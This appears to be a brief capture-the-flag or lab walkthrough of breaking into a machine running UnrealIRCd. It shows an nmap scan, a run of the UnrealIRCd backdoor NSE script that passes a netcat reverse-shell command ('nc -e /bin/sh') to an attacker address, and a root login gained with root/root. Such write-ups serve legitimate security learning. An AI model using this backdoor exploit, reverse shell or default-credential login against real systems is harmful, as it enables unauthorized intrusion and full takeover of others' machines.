We always start with an nmap scan…..
Nmap -sC -sV -oA nmap <Target-IP>
# Nmap 7.91 scan initiated Tue Apr 27 15:21:07 2021 as: nmap -sC -sV -oA nmap 192.168.57.120 Nmap scan report for 192.168.57.120 Host is up (0.22s latency). Not shown: 999 closed ports PORT STATE SERVICE VERSION 6667/tcp open irc UnrealIRCd Service Info: Host: irc.foonet.com Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . # Nmap done at Tue Apr 27 15:22:06 2021 -- 1 IP address (1 host up) scanned in 59.09 seconds
Just a IRC port cool doing some research on it i found out we have some popular irc-unrealircd-backdoor NSE script on Nmap so i give it a shot.
The irc-unrealircd-backdoor.command script argument can be used to run an arbitrary command on the remote system. Because of the nature of this vulnerability (the output is never returned) we have no way of getting the output of the command. It can, however, be used to start a netcat listener as demonstrated here
nmap -d -p6697 --script=irc-unrealircd-backdoor.nse --script-args=irc-unrealircd-backdoor.command='nc -e /bin/sh 10.10.10.1 1337' 192.168.74.120
Now before running the backdoor NSE script we need to start and Ncat listener on our machine.
Now let hit the NSE script.
And we have shell.
Took me time because the machine was so clean but using
root for both username and password drop us into the root shell.
Greeting From Muzec